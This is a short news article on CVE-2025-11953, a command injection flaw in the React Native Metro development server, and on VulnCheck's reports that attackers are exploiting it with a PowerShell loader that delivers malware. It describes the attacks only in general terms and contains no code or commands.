A critical vulnerability in the React Native Metro development server is currently being exploited to distribute malware to both Windows and Linux machines. This issue has not received the level of public attention that security researchers believe it warrants.
Details of the Vulnerability
The flaw, identified as CVE-2025-11953, affects the React Native Community command line tool, which is a widely used npm package with approximately 2.5 million weekly downloads. The vulnerability arises because the Metro development server, initiated by this command line tool, exposes an endpoint that is susceptible to OS command injection. This allows unauthenticated attackers to send POST requests to the server, enabling them to execute malicious executables.
Severity and Exploitation
Researchers from JFrog discovered the vulnerability and disclosed it in early November, shortly after Meta issued a fix. The flaw has been assigned a critical severity rating of 9.8 on the CVSS scale, indicating a high level of risk. Despite this, exploitation attempts were observed as early as December, prior to any significant public discourse on the vulnerability.
Exploitation Techniques
According to VulnCheck CTO Jacob Baines, the initial wave of exploitation began in December, with subsequent attacks noted in January. These attacks employed a multi-stage PowerShell-based loader that disabled Microsoft Defender protections before retrieving and executing a Rust-based binary designed to evade detection. The attacks originated from specific IP addresses, with payloads hosted on various servers.
Concerns Over Public Awareness
Baines has expressed concern over the lack of broad public acknowledgment of this vulnerability, despite ongoing exploitation. He noted that the Exploit Prediction Scoring System (EPSS) continues to assign a low exploitation probability of 0.00405, which does not align with the observed exploitation activity. This discrepancy highlights the need for increased awareness and vigilance regarding vulnerabilities in developer tooling.
This article was produced by NeonPulse.today using human and AI-assisted editorial processes, based on publicly available information. Content may be edited for clarity and style.
